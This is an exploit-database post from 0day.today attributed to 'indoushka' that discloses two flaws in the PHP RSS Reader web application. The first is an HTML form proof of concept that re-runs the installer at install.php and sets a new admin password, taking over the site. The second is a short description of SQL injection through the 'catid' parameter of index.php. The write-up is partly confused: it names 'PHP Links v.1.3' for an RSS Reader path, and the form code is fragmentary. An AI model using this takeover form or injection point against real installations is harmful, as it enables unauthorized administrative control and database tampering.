[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP RSS Reader Multiple Vulnerability

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14188
Category
web applications
Date add
25-09-2010
Platform
php
=====================================
PHP RSS Reader Multiple Vulnerability
=====================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

######################################################################## 

# Vendor:  http://www.phprssreader.com/

# Date: 2010-07-27 

# Author : indoushka 

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 

# Contact : 00213771818860

# Home : www.sec4ever.net

# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 

1 - Reinstallation Wizard :

		</style>
			
			<div id="content">
				<h1>PHP RSS Reader</h1>
				<h2>Reinstallation Wizard</h2>
				<form action="http://127.0.0.1/php_rss_reader_2.0/install.php?action=install" method="POST">
								<label>Admin Password:</label>
								<input type="password" id="acp_password" name="acp_password" value="" tabindex="8">*
							</li>
					</fieldset>
					<fieldset>
						<ul>
							<li>
								<input class="submit" type="submit" value="Install" tabindex="9">
								<input type="hidden" value="add" name="action">
							</li>
						</ul>
					</fieldset>	
				</form>
			</div>
		</body>	
	</html>
	
	<?php	
	
?>

-------------
2 - PHP Links v.1.3 SQL Injection :

Vulnerability description :

Input passed to the "catid" parameter in "index.php" is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 

Confirmed in version 1.3. Other versions may also be affected.

Affected items:

/php_rss_reader_2.0/index.php 

The impact of this vulnerability:

The remote attacker can manipulate SQL queries by injecting arbitrary SQL cod. 

How to fix this vulnerability:

Edit the source code to ensure that input is properly sanitised.

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------



#  0day.today [2024-10-06]  #